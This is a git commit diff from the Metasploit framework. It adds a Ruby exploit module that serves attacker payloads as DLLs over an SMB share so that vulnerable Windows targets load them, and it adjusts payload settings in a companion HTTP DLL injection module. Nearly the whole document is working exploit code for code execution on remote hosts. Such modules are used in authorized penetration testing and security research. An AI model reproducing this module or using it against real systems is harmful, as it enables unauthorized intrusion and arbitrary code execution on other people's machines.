Land #3294, @0x41414141's generic dll injection through SMB shared folder

2015-03-04 16:42:24 -06:00 · 2015-03-04 16:42:24 -06:00 · b9a30d60d4
parent bcdf261f3b e715eaba58
commit b9a30d60d4
2 changed files with 72 additions and 1 deletions
--- a/modules/exploits/windows/http/generic_http_dll_injection.rb
+++ b/modules/exploits/windows/http/generic_http_dll_injection.rb
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
      'Name'           => 'Generic Web Application DLL Injection',
      'Description'    => %q{
        This is a general-purpose module for exploiting conditions where a HTTP request
-        triggers a DLL load from a specified SMB share. This module serves payloads as
+        triggers a DLL load from an specified SMB share. This module serves payloads as
        DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would
        trigger the load of the DLL.
      },
@ -29,6 +29,11 @@ class Metasploit3 < Msf::Exploit::Remote
      'Privileged'     => false,
      'Arch'           => [ARCH_X86, ARCH_X86_64],
      'Stance'         => Msf::Exploit::Stance::Aggressive,
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
      'References'     =>
        [
          ['CWE', '427']
--- a/modules/exploits/windows/smb/generic_smb_dll_injection.rb
+++ b/modules/exploits/windows/smb/generic_smb_dll_injection.rb
@ -0,0 +1,66 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Generic DLL Injection From Shared Resource',
+      'Description'   => %q{
+        This is a general-purpose module for exploiting conditions where a DLL can be loaded
+        from an specified SMB share. This module serves payloads as DLLs over an SMB service.
+      },
+      'Author'      =>
+        [
+          'Matthew Hall <hallm[at]sec-1.com>'
+        ],
+      'References'     =>
+        [
+          ['CWE', '114']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Privileged'     => false,
+      'Platform'       => 'win',
+      'Arch'           => [ARCH_X86, ARCH_X86_64],
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+      'Targets'        =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Mar 04 2015'
+    ))
+
+    register_options(
+      [
+        OptString.new('FILE_NAME', [ false, 'DLL File name to share (Default: random .dll)'])
+      ], self.class)
+
+    deregister_options('FILE_CONTENTS')
+  end
+
+  def setup
+    super
+
+    self.file_contents = generate_payload_dll
+    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
+    print_status("File available on #{unc}...")
+  end
+
+end